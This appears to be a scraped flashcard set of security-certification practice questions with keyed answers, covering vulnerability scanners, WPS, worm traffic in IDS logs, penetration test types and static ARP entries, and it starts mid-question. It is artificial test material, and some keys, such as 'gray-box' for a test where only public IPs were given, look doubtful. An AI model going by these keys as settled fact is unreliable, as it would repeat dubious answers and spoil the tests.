A. Verify the certificate has not expired on the server C. Update the root certificate into the client computer certificate store

A security analyst is reviewing an assessment report that includes software versions, running services, supported encryption algorithms, and permission settings. Which of the following produced the report? A. Vulnerability scanner B. Protocol analyzer C. Network mapper D. Web inspector

A. Vulnerability scanner

A network administrator at a small office wants to simplify the configuration of mobile clients connecting to an encrypted wireless network. Which of the following should be implemented if the administrator does not want to provide the wireless password or certificate to the employees? A. WPS B. 802.1x C. WPA2-PSK D. TKIP

A. WPS

A network administrator is reviewing the following IDS logs: ALERT: 192.168.1.20:1027 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1034 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:2041 -> 192.168.1.21:445 malicious payload detected ALERT: 192.168.1.20:1165 -> 192.168.1.21:445 malicious payload detected Based on the above information, which of the following types of malware is triggering the IDS? A. Worm B. Logic bomb C. Rootkit D. Backdoor

A. Worm

A security analyst is attempting to break into a client's secure network. The analyst was not given prior information about the client, except for a block of public IP addresses that are currently in use. After network enumeration, the analyst's NEXT step is to perform: A. a gray-box penetration test. B. a risk analysis. C. a vulnerability assessment. D. an external security audit. E. a red team exercise.

A. a gray-box penetration test.

A security administrator wants to implement a logon script that will prevent MTM attacks on the local LAN. Which of the following commands should the security administrator implement within the script to accomplish this task? A. arp - s 192.168.1.1 00-3a d1-fa-b1-06 B. dig - [email protected] mypc.comptia.com C. nmap - A- T4 192.168.1.1 D. tcpdump - Inv host 192. 168.1.1. or either 00:3a:d1:fa:b1:06

A. arp - s 192.168.1.1 00-3a d1-fa-b1-06


Conjuntos de estudio relacionados

Chapter 1 The Human Body: An Orientation Questions

View Set

Bio 1010 Exam 3 practice questions

View Set

12) Trading strategies with options

View Set